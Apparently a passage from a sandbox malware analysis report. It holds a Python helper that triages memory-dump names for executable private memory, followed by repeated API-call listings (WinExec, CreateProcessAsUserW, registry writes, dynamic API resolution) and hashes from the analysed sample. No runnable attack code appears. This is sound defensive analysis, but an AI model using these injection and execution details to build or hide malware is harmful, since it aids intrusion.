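    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed field layout (see module docstring).
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<rsv>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    proc_index: int
    dump_index: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Low byte is the base protection; PAGE_GUARD / PAGE_NOCACHE live above it.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"{self.protect:#x}")

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"{self.state:#x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"{self.mem_type:#x}")

    @property
    def is_executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one .sdmp file name; raises ValueError if it does not fit the assumed layout."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not an sdmp name: {name!r}")
    return DumpRegion(
        proc_index=int(m["proc"], 16), dump_index=int(m["dump"], 16),
        base=int(m["base"], 16), protect=int(m["protect"], 16),
        state=int(m["state"], 16), mem_type=int(m["type"], 16),
    )


def triage(names: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (base, protection, note) for committed MEM_PRIVATE regions that are executable.

    Executable code in private (non-image) memory was not mapped from a file by the
    loader: typical of a manually mapped PE or injected shellcode. RWX regions are
    called out separately because code is rarely written and executed in place legitimately.
    """
    hits = []
    for name in names:
        r = parse_sdmp_name(name)
        if r.state != 0x1000 or r.mem_type != 0x20000 or not r.is_executable:
            continue
        note = "RWX private memory" if (r.protect & 0xFF) == 0x40 else "executable private memory"
        hits.append((f"{r.base:#x}", r.protect_name, note))
    return hits


# Dump names copied from the Memory Dump Source entries in this report section.
REPORT_DUMPS = [
    "00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for base, prot, note in triage(REPORT_DUMPS):
        print(f"{base:>12}  {prot:<24} {note}")
```

Run against the names on this page, the 02CF0000 region decodes as PAGE_READONLY (the PE header the report marks "based on PE: true"), 02CF1000 as PAGE_EXECUTE_READ private code, and the three 02D77000/02E6B000/02E6E000 regions as PAGE_EXECUTE_READWRITE private memory; those three are the ones worth carving and scanning first.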

Control-flow Graph (image not extracted)

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D0E5F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 6f103a155f62985500b8e4962b20c0122ff6c7b848e1ae5ba49ca638b2e66f55
• Instruction ID: b79c66e0ef0a60a7e73dc2af62a544c4a4f8eca60e475c7dfcad962b59c85571
• Opcode Fuzzy Hash: 6f103a155f62985500b8e4962b20c0122ff6c7b848e1ae5ba49ca638b2e66f55
• Instruction Fuzzy Hash: EB412135B001499BEB98EBA4E881FDFB3BAEF88700F504825E641E7391DA30AD05DF55
APIs
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
  • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D08814
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: HandleModule$AddressProc$CreateProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 3130163322-2353454454
• Opcode ID: 88693826341f8a24ffb147dd965ea5bdb486b9d3efcea3ab96d4b5f14a21b48c
• Instruction ID: 98c6b99df844908cb638f1159f123d7ed2322149895d22e0b30de0aac1b3de94
• Opcode Fuzzy Hash: 88693826341f8a24ffb147dd965ea5bdb486b9d3efcea3ab96d4b5f14a21b48c
• Instruction Fuzzy Hash: F511A8B1640248AFEB94EFA8EC81F9B77EDEB4C700F514460BA08D7750D634ED149B65
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02D08624
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7bd8fbb3866f29a4fec3a64e442f7dff34d895e4ff20c5d1c7c4882c2b852d34
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5c0eb9bd386ee6f0299ecb7253f04c550cddad0fd21f99b3a901c59955b79f8f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bd8fbb3866f29a4fec3a64e442f7dff34d895e4ff20c5d1c7c4882c2b852d34
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA018170784344BFF754EBE4EC81F6A77AEEB08700F914820BA04D6790E634AD14AA65
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02D08624
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8ebaab7c06b83777ead56075af3f92553469da9b958e8811aec1c24f802b486e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bda42e40a22f91ce9323a8789abb70ea4e20d26447efadda40de802e1bc53908
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ebaab7c06b83777ead56075af3f92553469da9b958e8811aec1c24f802b486e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF08170684344AFE754EBE4EC81F5A77AEEB08700F914820BA04D6790D634AD14AA65
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D05D74,?,?,02D03900,00000001), ref: 02D05C88
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D05D74,?,?,02D03900,00000001), ref: 02D05CB6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02D03900,02D05CF6,00000000,02D05D74,?,?,02D03900), ref: 02CF7DAA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02D03900,02D05D11,00000000,02D05D74,?,?,02D03900,00000001), ref: 02CF7FB7
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,02D05D74,?,?,02D03900,00000001), ref: 02D05D1B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02CFC3D9,00000000,02CFC433), ref: 02CFA797
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 503785936-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 98099bcfffbbb726bbe10151043a7b045c9b8b3f250e7bf92d08cc739d21f19d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 62f14f1432b9817313951caebc689f639575c9e36870221fb834e6e906a193b4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98099bcfffbbb726bbe10151043a7b045c9b8b3f250e7bf92d08cc739d21f19d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31318470E006499FDB80EFA8D881B9EB7F6BF08700F908465EA04AB390D7755E05DFA1
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02E6BA58), ref: 02D0F258
                                                                                                                                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(0000090C,00000000,00000000,00000001,00000000,0000001C,00000000,02D0F2C3), ref: 02D0F290
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(0000090C,0000090C,00000000,00000000,00000001,00000000,0000001C,00000000,02D0F2C3), ref: 02D0F29B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ba5f21741daa77265b9b340867ecea7368234e7362f1c0f879b55e0ae0e0a4ad
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 14a258e6d7cedb95759bfc69beeb1e2d55150efecab3d65a01dc5c245dafa75f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba5f21741daa77265b9b340867ecea7368234e7362f1c0f879b55e0ae0e0a4ad
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA115B71640204AFEB94EFA8D881A9F77EDEB08300B504425FA04E7650DA31EE40EF50
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02E6BA58), ref: 02D0F258
                                                                                                                                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(0000090C,00000000,00000000,00000001,00000000,0000001C,00000000,02D0F2C3), ref: 02D0F290
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(0000090C,0000090C,00000000,00000000,00000001,00000000,0000001C,00000000,02D0F2C3), ref: 02D0F29B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a3badcb2440a2119c5df25b5cfee3ae8805cdaa9f04af8f7fe4581803a8c2be0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f1c346fc388cf1af0805df282a794d69ef936e6685573c1fecee053461ee9917
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3badcb2440a2119c5df25b5cfee3ae8805cdaa9f04af8f7fe4581803a8c2be0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B115B71640204AFDB94EFA8D881A9F77ADEB08300B504425FA04E7650DA31EE40EF50
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: bccd87b65590d6f702c90e96f58c80e7a90b4cb21bd1f8a75867ca981bf28478
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2022b33a0adab5793f4ea78d4a1d770ede4af8c6da8e52981d43dc232222d488
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bccd87b65590d6f702c90e96f58c80e7a90b4cb21bd1f8a75867ca981bf28478
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0AF25708118C79BE4BB3A8C8C7AD279A5F807407105836E70E9B271DB648D4DDB62
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(02D0F4A4), ref: 02CF4C6E
                                                                                                                                                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 02CF4D5B
                                                                                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02CF4D6D
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
• Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
• Instruction ID: c89a721efcbfdf6d29cf9a9c3a4f8c2fd6c35c5a4413efbe0b13b79675d4be8c
• Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
• Instruction Fuzzy Hash: 53E012B92056059EEFE86F619D40B37333AAFC1740B289499EB04CA154D779D540BD38
APIs
• SysFreeString.OLEAUT32(?), ref: 02D073DA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
• Opcode ID: ad9c608d0fa90b472b3053c8023f2207b0a41a6e85cdd259b437d3da2b8605e4
• Instruction ID: d6f7479526d42888ac00766ba88c04e2709da2726d64f4615f28b8ae69b7cb07
• Opcode Fuzzy Hash: ad9c608d0fa90b472b3053c8023f2207b0a41a6e85cdd259b437d3da2b8605e4
• Instruction Fuzzy Hash: C2B1AC74A01608AFEB55CFA9D480A9DFBF2FF89314F248169E955AB3A0D730AC45CF50
APIs
• VariantCopy.OLEAUT32(00000000,00000000), ref: 02CFE781
  • Part of subcall function 02CFE364: VariantClear.OLEAUT32(?), ref: 02CFE373
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: Variant$ClearCopy
• String ID:
• API String ID: 274517740-0
• Opcode ID: b150236b39c0560de42cafd51b8c0bf570e379999351a0ca89d2d2b308b15124
• Instruction ID: 0ae13d6b6a236613a0c3a7225fff258ab02e8be49be33db133cf406a2e22af5c
• Opcode Fuzzy Hash: b150236b39c0560de42cafd51b8c0bf570e379999351a0ca89d2d2b308b15124
• Instruction Fuzzy Hash: A611A5607002108BD7F4AF2DC8C8A6B77DBAF84750B118467E74A8B675DB30CD45EA62
APIs
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
